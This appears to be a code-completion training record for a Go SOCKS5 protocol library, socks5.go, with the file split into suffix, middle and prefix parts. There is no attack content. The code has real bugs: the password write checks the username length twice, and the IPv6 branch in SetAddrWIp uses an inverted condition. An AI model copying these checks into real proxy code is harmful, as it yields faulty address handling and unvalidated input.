buf[1] = byte(cmd.Cmd)
buf[2] = cmd.Rsv
buf[3] = byte(cmd.Atyp)
buf = buf[:4]
switch cmd.Atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
buf = append(buf, cmd.Host...)
case Socks5CmdAtypTypeDomain:
buf = append(buf, uint8(len(cmd.Host)))
buf = append(buf, []byte(cmd.Host)...)
default:
return fmt.Errorf("unknown atyp %v type", cmd.Atyp)
}
buf = append(buf, port[0], port[1])
if _, err := w.Write(buf); err != nil {
return fmt.Errorf("w.write, %v", err)
}
return nil
}
func ReadSocks5Cmd(r io.Reader) (*Socks5CmdPack, error) {
cmd := Socks5CmdPack{}
err := cmd.Read(r)
if err != nil {
return nil, err
}
return &cmd, nil
}
// 请确定 cmd.Host 指向的内容未被其他位置使用,本函数会复用 cmd.Host 空间
func (cmd *Socks5CmdPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:4]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 command head, %v", err)
}
cmd.Ver = buf[0]
cmd.Cmd = Socks5CmdType(buf[1])
cmd.Rsv = buf[2]
cmd.Atyp = Socks5AtypType(buf[3])
if cmd.Ver != 5 {
return fmt.Errorf("unexpected protocol version %v ", cmd.Ver)
}
/* 这个不应该由这里判断。
if cmd.Cmd != 0x01 && cmd.Cmd != 0x02 && cmd.Cmd != 0x03 {
return nil, fmt.Errorf("未知的命令,cmd:%v。", cmd.Cmd)
}*/
/*if cmd.atyp == Socks5CmdAtypTypeIP4 {
buf = buf[:net.IPv4len]
}else */
switch cmd.Atyp {
case Socks5CmdAtypTypeIP4:
buf = buf[:net.IPv4len]
case Socks5CmdAtypTypeIP6:
buf = buf[:net.IPv6len]
case Socks5CmdAtypTypeDomain:
buf = buf[:1]
default:
return fmt.Errorf("unexpected address type %v", cmd.Atyp)
}
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks5 cmd.Host, %v", err)
}
switch cmd.Atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
cmd.Host = append(cmd.Host[:0], buf...)
case Socks5CmdAtypTypeDomain:
buf = buf[:buf[0]]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks5 cmd.Host, %v", err)
}
cmd.Host = append(cmd.Host, buf...)
}
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks5 cmd.Port, %v", err)
}
cmd.Port = binary.BigEndian.Uint16(buf)
return nil
}
func (s *Socks5CmdPack) GetHostString() (string, error) {
switch s.Atyp {
case Socks5CmdAtypTypeIP4:
ip := net.IP(s.Host)
ip = ip.To4()
if len(ip) != net.IPv4len {
return "", fmt.Errorf("%v is not ipv4 address", s.Host)
}
return ip.String(), nil
case Socks5CmdAtypTypeIP6:
ip := net.IP(s.Host)
ip = ip.To16()
if len(ip) != net.IPv6len {
return "", fmt.Errorf("%v is not ipv6 address", s.Host)
}
return ip.String(), nil
case Socks5CmdAtypTypeDomain:
return string(s.Host), nil
default:
return "", fmt.Errorf("unexpected atyp %v", s.Atyp)
}
}
func (s *Socks5CmdPack) GetAddrString() (string, error) {
host, err := s.GetHostString()
if err != nil {
return "", err
}
return net.JoinHostPort(host, strconv.Itoa(int(s.Port))), nil
}
func (s *Socks5CmdPack) SetAddrAuto(addr string) error {
host, portStr, err := net.SplitHostPort(addr)
if err != nil {
return err
}
port, err := strconv.Atoi(portStr)
if err != nil {
return err
}
if port < 0 || port > 0xFFFF {
return fmt.Errorf("port %v < 0 || port %v > 0xFFFF", port, port)
}
s.SetHostAuto(host)
s.Port = uint16(port)
return nil
}
func (s *Socks5CmdPack) GetHostIp() (net.IP, error) {
var ip net.IP
switch s.Atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
ip = net.IP(s.Host)
return ip, nil
case Socks5CmdAtypTypeDomain:
ip = net.ParseIP(string(s.Host))
if len(ip) == 0 {
return nil, fmt.Errorf("%v is not ip address", s.Host)
}
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
return ipv4, nil
}
ipv6 := ip.To16()
if len(ipv6) == net.IPv6len {
return ipv6, nil
}
return nil, fmt.Errorf("%v is not ipv4 or ipv6 address", s.Host)
default:
return nil, fmt.Errorf("unexpected atyp %v", s.Atyp)
}
}
func (s *Socks5CmdPack) SetHostAuto(v string) {
ip := net.ParseIP(v)
if len(ip) != 0 {
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
s.Atyp = Socks5CmdAtypTypeIP4
s.Host = []byte(ipv4)
return
}
ipv6 := ip.To16()
if len(ipv6) == net.IPv6len {
s.Atyp = Socks5CmdAtypTypeIP6
s.Host = []byte(ipv6)
return
}
}
s.Atyp = Socks5CmdAtypTypeDomain
s.Host = []byte(v)
return
}
func (s *Socks5CmdPack) SetHostDomain(domain string) {
s.Atyp = Socks5CmdAtypTypeDomain
s.Host = []byte(domain)
}
func (s *Socks5CmdPack) SetHostIp(ip net.IP) error {
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
s.Atyp = Socks5CmdAtypTypeIP4
s.Host = []byte(ipv4)
return nil
}
ipv6 := ip.To16()
if len(ipv6) == net.IPv6len {
s.Atyp = Socks5CmdAtypTypeIP6
s.Host = []byte(ipv6)
return nil
}
return fmt.Errorf("%v is not ipv4 or ipv6 address", ip)
}
func ReadSocks5AuthPassword(r io.Reader) (*Socks5AuthPasswordPack, error) {
p := Socks5AuthPasswordPack{}
err := p.Read(r)
if err != nil {
return nil, err
}
return &p, nil
}
func (p *Socks5AuthPasswordPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 auth head, %v", err)
}
p.Ver = buf[0]
l := buf[1]
if p.Ver != 1 {
return fmt.Errorf("unexpected protocol version %v", p.Ver)
}
buf = buf[:l+1]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 auth.Username, %v", err)
}
p.Username = string(buf[:len(buf)-1])
buf = buf[:buf[len(buf)-1]]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 auth.Password, %v", err)
}
p.Password = string(buf)
return nil
}
func WriteSocks5AuthPassword(w io.Writer, pass *Socks5AuthPasswordPack) error {
if pass == nil {
return fmt.Errorf("pass is nil")
}
return pass.Write(w)
}
func (pass *Socks5AuthPasswordPack) Write(w io.Writer) error {
if len(pass.Username) > 0xFF || len(pass.Username) > 0xFF {
return fmt.Errorf("username or password is too long")
}
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
buf[0] = pass.Ver
buf[1] = uint8(len(pass.Username))
buf = append(buf, []byte(pass.Username)...)
buf = append(buf, uint8(len(pass.Password)))
buf = append(buf, pass.Password...)
if _, err := w.Write(buf); err != nil {
return err
}
return nil
}
func ReadSocks5AuthPasswordR(r io.Reader) (*Socks5AuthPasswordRPack, error) {
pr := Socks5AuthPasswordRPack{}
err := pr.Read(r)
if err != nil {
return nil, err
}
return &pr, nil
}
func (pr *Socks5AuthPasswordRPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return err
}
pr.Ver = buf[0]
pr.Status = Socks5AuthPasswordRStatusType(buf[1])
if pr.Ver != 1 {
return fmt.Errorf("unexpected protocol version %v", pr.Ver)
}
return nil
}
func WriteSocks5AuthPasswordR(w io.Writer, r *Socks5AuthPasswordRPack) error {
if r == nil {
return fmt.Errorf("r is nil")
}
return r.Write(w)
}
func (r *Socks5AuthPasswordRPack) Write(w io.Writer) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
buf[0] = r.Ver
buf[1] = byte(r.Status)
if _, err := w.Write(buf); err != nil {
return fmt.Errorf("w.write, %v", err)
}
return nil
}
type Socks5UdpPack struct {
Rsv uint16
FRAG byte
ATYP Socks5AtypType
Host string
Ip net.IP
Port uint16
Data []byte
}
func (p *Socks5UdpPack) Parse(data []byte) error {
if len(data) < 11 {
return fmt.Errorf("data length is too short")
}
rsv := binary.BigEndian.Uint16(data)
frag := data[2]
atyp := Socks5AtypType(data[3])
ip := p.Ip[:0]
host := ""
portData := data
switch Socks5AtypType(atyp) {
case Socks5CmdAtypTypeIP4:
ip = append(ip, data[4:4+net.IPv4len]...)
portData = data[4+net.IPv4len:]
case Socks5CmdAtypTypeIP6:
if len(data) < 23 {
return fmt.Errorf("data length is too short")
}
ip = append(ip, data[4:4+net.IPv6len]...)
portData = data[4+net.IPv6len:]
case Socks5CmdAtypTypeDomain:
l := int(data[4])
if len(data) < 7+l {
return fmt.Errorf("data length is too short")
}
host = string(data[5 : 5+l])
portData = data[5+l:]
default:
return fmt.Errorf("unexpected atyp %v", atyp)
}
*p = Socks5UdpPack{}
port := binary.BigEndian.Uint16(portData[:2])
udpData := portData[2:]
p.Rsv = rsv
p.FRAG = frag
p.ATYP = atyp
p.Host = host
p.Ip = append(p.Ip[:0], ip...)
p.Port = port
p.Data = append(p.Data[:0], udpData...)
return nil
}
func (p *Socks5UdpPack) To(data []byte) (int, error) {
atyp := Socks5AtypType(p.ATYP)
ip := p.Ip
host := []byte(p.Host)
hostSize := 0
port := p.Port
if atyp == Socks5CmdAtypTypeAuto {
if len(ip) == 0 {
ip = net.ParseIP(p.Host)
}
if len(ip) == 0 {
atyp = Socks5CmdAtypTypeDomain
} else {
if ipv4 := ip.To4(); len(ipv4) == net.IPv4len {
ip = ipv4
}
switch len(ip) {
case net.IPv4len:
atyp = Socks5CmdAtypTypeIP4
ip = ip
case net.IPv6len:
atyp = Socks5CmdAtypTypeIP6
default:
return 0, fmt.Errorf("ip %v length is incorrect", ip)
}
}
}
switch atyp {
case Socks5CmdAtypTypeIP4:
ip = ip.To4()
if len(ip) != net.IPv4len {
return 0, fmt.Errorf("ipv4 %v length is incorrect", ip)
}
hostSize = net.IPv4len
case Socks5CmdAtypTypeIP6:
if len(ip) != net.IPv6len {
return 0, fmt.Errorf("ipv6 %v length is incorrect", ip)
}
hostSize = net.IPv6len
case Socks5CmdAtypTypeDomain:
if len(host) > 0xFF {
return 0, fmt.Errorf("host %v is too long", host)
}
hostSize = len(host) + 1
default:
return 0, fmt.Errorf("unexpected atyp %v", atyp)
}
mustSize := 6 + hostSize + len(p.Data)
if len(data) < mustSize {
return mustSize, fmt.Errorf("not enough space")
}
binary.BigEndian.PutUint16(data, p.Rsv)
data[2] = p.FRAG
data[3] = byte(atyp)
switch atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
copy(data[4:4+hostSize], ip)
case Socks5CmdAtypTypeDomain:
data[4] = byte(len(host))
copy(data[4+1:4+hostSize], host)
}
binary.BigEndian.PutUint16(data[4+hostSize:], port)
copy(data[4+hostSize+2:], p.Data)
return mustSize, nil
}
func (p *Socks5UdpPack) SetAddr(addr net.Addr) error {
udpAddr, _ := addr.(*net.UDPAddr)
if udpAddr == nil {
return fmt.Errorf("非预期的 udpAddr 格式, %v", addr)
}
err := p.SetAddrWIp(udpAddr.IP)
if err != nil {
return fmt.Errorf("SetAddrWIp,%v", err)
}
p.SetAddrWPort(udpAddr.Port)
return nil
}
func (p *Socks5UdpPack) SetAddrWIp(ip net.IP) error {
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
p.Ip = ipv4
p.ATYP = Socks5CmdAtypTypeIP4
return nil
}
ipv6 := ip.To16()
if len(ipv6) != net.IPv6len {
p.Ip = ipv6
p.ATYP = Socks5CmdAtypTypeIP6
return nil
}
return fmt.Errorf("非预期的 ip 版本,%v", ip)
}
func (p *Socks5UdpPack) SetAddrWPort(port int) {
p.Port = uint16(port)
}
func (p *Socks5UdpPack) GetUdpAddr() (*net.UDPAddr, error) {
switch p.ATYP {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
return &net.UDPAddr{
IP: p.Ip,
Port: int(p.Port),
Zone: "",
}, nil
default:
return nil, fmt.Errorf("非预期的地址类型")
}
} | if _, err := w.Write(buf); err != nil {
return fmt.Errorf("w.write,%v", err)
}
| random_line_split |
socks5.go | package socks5
import (
"encoding/binary"
"fmt"
"io"
"net"
"strconv"
"github.com/gamexg/proxylib/mempool"
)
// socks5 版本号
const Socks5Version byte = 0x05
// socks5 鉴定方式
// 无需鉴定 和 用户名密码鉴定
type Socks5AuthMethodType byte
const (
Socks5AuthMethodTypeNone Socks5AuthMethodType = 0x00
Socks5AuthMethodTypePassword Socks5AuthMethodType = 0x02
// 当服务端不支持客户端的鉴定方式时,返回这个类型
// 客户端需要立刻关闭连接
Socks5AuthMethodTypeErr Socks5AuthMethodType = 0xFF
)
// socks5 请求类型 ,socks5 cmd 状态回复
// socks5 请求类型有:tcp 传出连接、 tcp 传入连接 或 udp 连接
// socks5 回复状态有: 成功、一般性失败、规则不允许转发、主机不可达、atyp不支持、cmd命令不支持 等
type Socks5CmdType byte
const (
Socks5CmdTypeConnect Socks5CmdType = 0x01
Socks5CmdTypeBind Socks5CmdType = 0x02
Socks5CmdTypeUdpAssociate Socks5CmdType = 0x3
// cmd 回复,成功
Socks5CmdReplySucceeded Socks5CmdType = 0x00
// cmd 回复,普通SOCKS服务器连接失败
Socks5CmdReplyGeneralSocksServerFailure Socks5CmdType = 0x01
// cmd 回复,规则不允许
Socks5CmdReplyConnectionNotAllowedByRuleset Socks5CmdType = 0x02
// cmd 回复,网络不可达
Socks5CmdReplyNetworkUnreachable Socks5CmdType = 0x03
// cmd 回复,主机不可达
Socks5CmdReplyHostUnreachable Socks5CmdType = 0x04
// cmd 回复,连接被拒绝
Socks5CmdReplyConnectionRefused Socks5CmdType = 0x05
// cmd 回复,ttl超时
Socks5CmdReplyTtlExpired Socks5CmdType = 0x06
// cmd 回复,不支持的命令
Socks5CmdReplyCommandNotSupported Socks5CmdType = 0x07
// cmd 回复,不支持的地址类型
Socks5CmdReplyAddressTypeNotSupported Socks5CmdType = 0x08
// 用户自定义范围 0x09- 0xFF
// 自定义,内部错误
Socks5CmdReplyInternalError Socks5CmdType = 0x010
)
// socks 5 cmd 命令 Atyp 类型
type Socks5AtypType byte
const (
//内部使用,根据 cmd.host、cmd.Ip 内容自动确定 atyp 值
Socks5CmdAtypTypeAuto Socks5AtypType = 0x00
Socks5CmdAtypTypeIP4 Socks5AtypType = 0x01
Socks5CmdAtypTypeDomain Socks5AtypType = 0x03
Socks5CmdAtypTypeIP6 Socks5AtypType = 0x04
)
type Socks5AuthPasswordRStatusType byte
const (
// 用户名、密码正确
Socks5AuthPasswordRStatusTypeSucceeded Socks5AuthPasswordRStatusType = 0x00
// 用户名、密码错误
Socks5AuthPasswordRStatusTypeErr Socks5AuthPasswordRStatusType = 0x01
)
// 鉴定请求
type Socks5AuthPack struct {
Ver byte // 版本5
Methods []Socks5AuthMethodType
}
// 鉴定回应
type Socks5AuthRPack struct {
Ver byte // 版本 5
Method Socks5AuthMethodType
}
// 命令及回应
type Socks5CmdPack struct {
Ver byte // 版本 5
Cmd Socks5CmdType
Rsv byte
Atyp Socks5AtypType
Host []byte
Port uint16
}
// 用户名、密码
type Socks5AuthPasswordPack struct {
Ver byte //目前版本为 1
Username string
Password string
}
type Socks5AuthPasswordRPack struct {
Ver byte //目前版本为 1
Status Socks5AuthPasswordRStatusType // 0 成功 1失败
}
func (auth *Socks5AuthPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
b := buf[:2]
if _, err := io.ReadFull(r, b); err != nil {
return fmt.Errorf("failed to read socks5 auth head, %v", err)
}
auth.Ver = b[0]
nmethods := b[1]
if auth.Ver != 5 {
return fmt.Errorf("ver %v is incorrect", auth.Ver)
}
b = buf[:uint8(nmethods)]
if _, err := io.ReadFull(r, b); err != nil {
return fmt.Errorf("failed to read socks5 auth methods, %v", err)
}
methods := make([]Socks5AuthMethodType, len(b))
for i := range methods {
methods[i] = Socks5AuthMethodType(b[i])
}
auth.Methods = methods
return nil
}
func (auth *Socks5AuthPack) HasMethod(m Socks5AuthMethodType) bool {
for _, v := range auth.Methods {
if v == m {
return true
}
}
return false
}
// 读取鉴定
// 注意,所有这种类型的操作都是阻塞的,需要自己设置超时机制
// 内部会检查协议版本等参数。
func ReadAuth(r io.Reader) (*Socks5AuthPack, error) {
auth := Socks5AuthPack{}
err := auth.Read(r)
if err != nil {
return nil, err
}
return &auth, nil
}
func (auth *Socks5AuthPack) Write(w io.Writer) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
buf[0] = 5
buf[1] = uint8(len(auth.Methods))
for _, v := range auth.Methods {
buf = append(buf, byte(v))
}
if _, err := w.Write(buf); err != nil {
return fmt.Errorf("w.write,%v", err)
}
return nil
}
func WriteAuth(w io.Writer, auth *Socks5AuthPack) error {
if auth == nil {
return fmt.Errorf("auth is nil")
}
return auth.Write(w)
}
func ReadSocks5AuthR(r | er) (*Socks5AuthRPack, error) {
ar := Socks5AuthRPack{}
err := ar.Read(r)
if err != nil {
return nil, err
}
return &ar, err
}
func (ar *Socks5AuthRPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return err
}
ar.Ver = buf[0]
ar.Method = Socks5AuthMethodType(buf[1])
if ar.Ver != 5 {
return fmt.Errorf("ver %v is incorrect", buf[0])
}
return nil
}
func WriteSocks5AuthR(w io.Writer, cmd *Socks5AuthRPack) error {
if cmd == nil {
return fmt.Errorf("cmd is nil")
}
return cmd.Write(w)
}
func (cmd *Socks5AuthRPack) Write(w io.Writer) error {
if _, err := w.Write([]byte{cmd.Ver, byte(cmd.Method)}); err != nil {
return fmt.Errorf("w.write, %v", err)
}
return nil
}
func WriteSocks5Cmd(w io.Writer, cmd *Socks5CmdPack) error {
if cmd == nil {
return fmt.Errorf("cmd is nil")
}
return cmd.Write(w)
}
func (cmd *Socks5CmdPack) Write(w io.Writer) error {
hostSize := len(cmd.Host)
if cmd.Atyp == Socks5CmdAtypTypeDomain && hostSize > 255 {
return fmt.Errorf("domain %v is too long", cmd.Host)
}
buf := mempool.Get(1024)
defer mempool.Put(buf)
port := [2]byte{0}
binary.BigEndian.PutUint16(port[:], cmd.Port)
buf[0] = cmd.Ver
buf[1] = byte(cmd.Cmd)
buf[2] = cmd.Rsv
buf[3] = byte(cmd.Atyp)
buf = buf[:4]
switch cmd.Atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
buf = append(buf, cmd.Host...)
case Socks5CmdAtypTypeDomain:
buf = append(buf, uint8(len(cmd.Host)))
buf = append(buf, []byte(cmd.Host)...)
default:
return fmt.Errorf("unknown atyp %v type", cmd.Atyp)
}
buf = append(buf, port[0], port[1])
if _, err := w.Write(buf); err != nil {
return fmt.Errorf("w.write, %v", err)
}
return nil
}
func ReadSocks5Cmd(r io.Reader) (*Socks5CmdPack, error) {
cmd := Socks5CmdPack{}
err := cmd.Read(r)
if err != nil {
return nil, err
}
return &cmd, nil
}
// 请确定 cmd.Host 指向的内容未被其他位置使用,本函数会复用 cmd.Host 空间
func (cmd *Socks5CmdPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:4]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 command head, %v", err)
}
cmd.Ver = buf[0]
cmd.Cmd = Socks5CmdType(buf[1])
cmd.Rsv = buf[2]
cmd.Atyp = Socks5AtypType(buf[3])
if cmd.Ver != 5 {
return fmt.Errorf("unexpected protocol version %v ", cmd.Ver)
}
/* 这个不应该由这里判断。
if cmd.Cmd != 0x01 && cmd.Cmd != 0x02 && cmd.Cmd != 0x03 {
return nil, fmt.Errorf("未知的命令,cmd:%v。", cmd.Cmd)
}*/
/*if cmd.atyp == Socks5CmdAtypTypeIP4 {
buf = buf[:net.IPv4len]
}else */
switch cmd.Atyp {
case Socks5CmdAtypTypeIP4:
buf = buf[:net.IPv4len]
case Socks5CmdAtypTypeIP6:
buf = buf[:net.IPv6len]
case Socks5CmdAtypTypeDomain:
buf = buf[:1]
default:
return fmt.Errorf("unexpected address type %v", cmd.Atyp)
}
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks5 cmd.Host, %v", err)
}
switch cmd.Atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
cmd.Host = append(cmd.Host[:0], buf...)
case Socks5CmdAtypTypeDomain:
buf = buf[:buf[0]]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks5 cmd.Host, %v", err)
}
cmd.Host = append(cmd.Host, buf...)
}
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks5 cmd.Port, %v", err)
}
cmd.Port = binary.BigEndian.Uint16(buf)
return nil
}
func (s *Socks5CmdPack) GetHostString() (string, error) {
switch s.Atyp {
case Socks5CmdAtypTypeIP4:
ip := net.IP(s.Host)
ip = ip.To4()
if len(ip) != net.IPv4len {
return "", fmt.Errorf("%v is not ipv4 address", s.Host)
}
return ip.String(), nil
case Socks5CmdAtypTypeIP6:
ip := net.IP(s.Host)
ip = ip.To16()
if len(ip) != net.IPv6len {
return "", fmt.Errorf("%v is not ipv6 address", s.Host)
}
return ip.String(), nil
case Socks5CmdAtypTypeDomain:
return string(s.Host), nil
default:
return "", fmt.Errorf("unexpected atyp %v", s.Atyp)
}
}
func (s *Socks5CmdPack) GetAddrString() (string, error) {
host, err := s.GetHostString()
if err != nil {
return "", err
}
return net.JoinHostPort(host, strconv.Itoa(int(s.Port))), nil
}
func (s *Socks5CmdPack) SetAddrAuto(addr string) error {
host, portStr, err := net.SplitHostPort(addr)
if err != nil {
return err
}
port, err := strconv.Atoi(portStr)
if err != nil {
return err
}
if port < 0 || port > 0xFFFF {
return fmt.Errorf("port %v < 0 || port %v > 0xFFFF", port, port)
}
s.SetHostAuto(host)
s.Port = uint16(port)
return nil
}
func (s *Socks5CmdPack) GetHostIp() (net.IP, error) {
var ip net.IP
switch s.Atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
ip = net.IP(s.Host)
return ip, nil
case Socks5CmdAtypTypeDomain:
ip = net.ParseIP(string(s.Host))
if len(ip) == 0 {
return nil, fmt.Errorf("%v is not ip address", s.Host)
}
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
return ipv4, nil
}
ipv6 := ip.To16()
if len(ipv6) == net.IPv6len {
return ipv6, nil
}
return nil, fmt.Errorf("%v is not ipv4 or ipv6 address", s.Host)
default:
return nil, fmt.Errorf("unexpected atyp %v", s.Atyp)
}
}
func (s *Socks5CmdPack) SetHostAuto(v string) {
ip := net.ParseIP(v)
if len(ip) != 0 {
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
s.Atyp = Socks5CmdAtypTypeIP4
s.Host = []byte(ipv4)
return
}
ipv6 := ip.To16()
if len(ipv6) == net.IPv6len {
s.Atyp = Socks5CmdAtypTypeIP6
s.Host = []byte(ipv6)
return
}
}
s.Atyp = Socks5CmdAtypTypeDomain
s.Host = []byte(v)
return
}
func (s *Socks5CmdPack) SetHostDomain(domain string) {
s.Atyp = Socks5CmdAtypTypeDomain
s.Host = []byte(domain)
}
func (s *Socks5CmdPack) SetHostIp(ip net.IP) error {
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
s.Atyp = Socks5CmdAtypTypeIP4
s.Host = []byte(ipv4)
return nil
}
ipv6 := ip.To16()
if len(ipv6) == net.IPv6len {
s.Atyp = Socks5CmdAtypTypeIP6
s.Host = []byte(ipv6)
return nil
}
return fmt.Errorf("%v is not ipv4 or ipv6 address", ip)
}
func ReadSocks5AuthPassword(r io.Reader) (*Socks5AuthPasswordPack, error) {
p := Socks5AuthPasswordPack{}
err := p.Read(r)
if err != nil {
return nil, err
}
return &p, nil
}
func (p *Socks5AuthPasswordPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 auth head, %v", err)
}
p.Ver = buf[0]
l := buf[1]
if p.Ver != 1 {
return fmt.Errorf("unexpected protocol version %v", p.Ver)
}
buf = buf[:l+1]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 auth.Username, %v", err)
}
p.Username = string(buf[:len(buf)-1])
buf = buf[:buf[len(buf)-1]]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 auth.Password, %v", err)
}
p.Password = string(buf)
return nil
}
func WriteSocks5AuthPassword(w io.Writer, pass *Socks5AuthPasswordPack) error {
if pass == nil {
return fmt.Errorf("pass is nil")
}
return pass.Write(w)
}
func (pass *Socks5AuthPasswordPack) Write(w io.Writer) error {
if len(pass.Username) > 0xFF || len(pass.Username) > 0xFF {
return fmt.Errorf("username or password is too long")
}
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
buf[0] = pass.Ver
buf[1] = uint8(len(pass.Username))
buf = append(buf, []byte(pass.Username)...)
buf = append(buf, uint8(len(pass.Password)))
buf = append(buf, pass.Password...)
if _, err := w.Write(buf); err != nil {
return err
}
return nil
}
func ReadSocks5AuthPasswordR(r io.Reader) (*Socks5AuthPasswordRPack, error) {
pr := Socks5AuthPasswordRPack{}
err := pr.Read(r)
if err != nil {
return nil, err
}
return &pr, nil
}
func (pr *Socks5AuthPasswordRPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return err
}
pr.Ver = buf[0]
pr.Status = Socks5AuthPasswordRStatusType(buf[1])
if pr.Ver != 1 {
return fmt.Errorf("unexpected protocol version %v", pr.Ver)
}
return nil
}
func WriteSocks5AuthPasswordR(w io.Writer, r *Socks5AuthPasswordRPack) error {
if r == nil {
return fmt.Errorf("r is nil")
}
return r.Write(w)
}
func (r *Socks5AuthPasswordRPack) Write(w io.Writer) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
buf[0] = r.Ver
buf[1] = byte(r.Status)
if _, err := w.Write(buf); err != nil {
return fmt.Errorf("w.write, %v", err)
}
return nil
}
type Socks5UdpPack struct {
Rsv uint16
FRAG byte
ATYP Socks5AtypType
Host string
Ip net.IP
Port uint16
Data []byte
}
func (p *Socks5UdpPack) Parse(data []byte) error {
if len(data) < 11 {
return fmt.Errorf("data length is too short")
}
rsv := binary.BigEndian.Uint16(data)
frag := data[2]
atyp := Socks5AtypType(data[3])
ip := p.Ip[:0]
host := ""
portData := data
switch Socks5AtypType(atyp) {
case Socks5CmdAtypTypeIP4:
ip = append(ip, data[4:4+net.IPv4len]...)
portData = data[4+net.IPv4len:]
case Socks5CmdAtypTypeIP6:
if len(data) < 23 {
return fmt.Errorf("data length is too short")
}
ip = append(ip, data[4:4+net.IPv6len]...)
portData = data[4+net.IPv6len:]
case Socks5CmdAtypTypeDomain:
l := int(data[4])
if len(data) < 7+l {
return fmt.Errorf("data length is too short")
}
host = string(data[5 : 5+l])
portData = data[5+l:]
default:
return fmt.Errorf("unexpected atyp %v", atyp)
}
*p = Socks5UdpPack{}
port := binary.BigEndian.Uint16(portData[:2])
udpData := portData[2:]
p.Rsv = rsv
p.FRAG = frag
p.ATYP = atyp
p.Host = host
p.Ip = append(p.Ip[:0], ip...)
p.Port = port
p.Data = append(p.Data[:0], udpData...)
return nil
}
func (p *Socks5UdpPack) To(data []byte) (int, error) {
atyp := Socks5AtypType(p.ATYP)
ip := p.Ip
host := []byte(p.Host)
hostSize := 0
port := p.Port
if atyp == Socks5CmdAtypTypeAuto {
if len(ip) == 0 {
ip = net.ParseIP(p.Host)
}
if len(ip) == 0 {
atyp = Socks5CmdAtypTypeDomain
} else {
if ipv4 := ip.To4(); len(ipv4) == net.IPv4len {
ip = ipv4
}
switch len(ip) {
case net.IPv4len:
atyp = Socks5CmdAtypTypeIP4
ip = ip
case net.IPv6len:
atyp = Socks5CmdAtypTypeIP6
default:
return 0, fmt.Errorf("ip %v length is incorrect", ip)
}
}
}
switch atyp {
case Socks5CmdAtypTypeIP4:
ip = ip.To4()
if len(ip) != net.IPv4len {
return 0, fmt.Errorf("ipv4 %v length is incorrect", ip)
}
hostSize = net.IPv4len
case Socks5CmdAtypTypeIP6:
if len(ip) != net.IPv6len {
return 0, fmt.Errorf("ipv6 %v length is incorrect", ip)
}
hostSize = net.IPv6len
case Socks5CmdAtypTypeDomain:
if len(host) > 0xFF {
return 0, fmt.Errorf("host %v is too long", host)
}
hostSize = len(host) + 1
default:
return 0, fmt.Errorf("unexpected atyp %v", atyp)
}
mustSize := 6 + hostSize + len(p.Data)
if len(data) < mustSize {
return mustSize, fmt.Errorf("not enough space")
}
binary.BigEndian.PutUint16(data, p.Rsv)
data[2] = p.FRAG
data[3] = byte(atyp)
switch atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
copy(data[4:4+hostSize], ip)
case Socks5CmdAtypTypeDomain:
data[4] = byte(len(host))
copy(data[4+1:4+hostSize], host)
}
binary.BigEndian.PutUint16(data[4+hostSize:], port)
copy(data[4+hostSize+2:], p.Data)
return mustSize, nil
}
func (p *Socks5UdpPack) SetAddr(addr net.Addr) error {
udpAddr, _ := addr.(*net.UDPAddr)
if udpAddr == nil {
return fmt.Errorf("非预期的 udpAddr 格式, %v", addr)
}
